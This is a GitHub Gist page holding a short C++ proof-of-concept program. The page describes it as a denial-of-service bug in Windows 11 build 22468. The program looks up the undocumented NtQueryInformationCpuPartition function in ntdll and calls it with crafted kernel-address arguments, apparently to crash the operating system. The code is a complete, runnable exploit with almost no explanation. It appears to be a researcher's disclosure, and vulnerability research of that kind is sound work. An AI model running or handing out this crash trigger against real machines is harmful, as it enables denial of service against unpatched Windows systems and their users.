Created
October 5, 2021 10:33
-
-
Save hfiref0x/48bdc12241d0a981a6da473e979c8aff to your computer and use it in GitHub Desktop.
Denial of Service bug in Windows 11 (22468 build) NtQueryInformationCpuPartition
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <cstdio> | |
| typedef NTSTATUS(NTAPI* pfnNtQueryInformationCpuPartition)( | |
| ULONG_PTR PartitionHandle, | |
| ULONG_PTR Flags, | |
| ULONG_PTR OutputBuffer, | |
| ULONG_PTR Length, | |
| ULONG_PTR ReturnedLength | |
| ); | |
| #define FUNC_NAME "NtQueryInformationCpuPartition" | |
| int main() | |
| { | |
| HMODULE hDll = GetModuleHandle(TEXT("ntdll.dll")); | |
| pfnNtQueryInformationCpuPartition pvfn; | |
| printf_s("[>]Start\r\n"); | |
| if (hDll) { | |
| pvfn = (pfnNtQueryInformationCpuPartition)GetProcAddress(hDll, FUNC_NAME); | |
| if (pvfn) { | |
| NTSTATUS ntStatus = pvfn(0x00007ffffffefffe, | |
| 0xffff800000000001, | |
| 0x0000800000000000, | |
| 0x000000000000fffe, | |
| 0xfffff80000000000); | |
| printf_s(">%s NTSTATUS 0x%lX\r\n", FUNC_NAME, ntStatus); | |
| } | |
| else { | |
| DWORD lastError = GetLastError(); | |
| printf_s(">%s not found, GetLastError %lu\r\n", FUNC_NAME, lastError); | |
| } | |
| } | |
| else { | |
| printf_s(">No dll handle\r\n"); | |
| } | |
| printf_s("[<]Stop"); | |
| ExitProcess(0); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment